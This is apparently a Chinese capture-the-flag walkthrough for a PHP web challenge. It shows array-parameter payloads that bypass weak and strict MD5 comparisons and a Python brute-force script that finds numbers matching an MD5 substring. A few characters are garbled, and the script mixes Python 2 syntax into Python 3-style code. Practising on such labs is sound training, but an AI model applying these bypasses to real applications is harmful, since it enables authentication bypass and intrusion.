打开页面之后发现只有中间有几行字,直接查看源代码
源码中发现了php代码,是弱比较。直接使用数组绕过
payload: ?a[]=1&b[]=2
之后进入页面
发现此页面是让你输入一个字符串经过MD5加密后的第六到第十位等于等号后面的数字,这里我们直接使用脚本爆破
注意:经过尝试字符串只能为数字
#coding=utf-8
from multiprocessing.dummy import Pool as tp
import hashlib
knownMd5 = 'e012c'
def md5(text):
return hashlib.md5(str(text).encode('utf-8')).hexdigest()
def findCode(code):
key = code.split(':')
start = int(key[0])
end = int(key[1])
for code in range(start, end):
if md5(code)[5:10] == knownMd5:
print code
break
list=[]
for i in range(3): #这里的range(number)指爆破出多少结果停止
list.append(str(10000000*i) + ':' + str(10000000*(i+1)))
pool = tp() #使用多线程加快爆破速度
pool.map(findCode, list)
pool.close()
pool.join()
将脚本运行结果写入页面中提交
之后进入此页面
继续查看源代码发现
额。。。。。看不懂,搜索之后说是绕过MD5进行注入
详情请看:https://blog.csdn.net/qq_45521281/article/details/105848249
最终我们进入
这次是MD5的强比较,但我们依然可以使用数组绕过。
payload:param1[]=1¶m2[]=2
注意:此处的提交方式需要使用post方式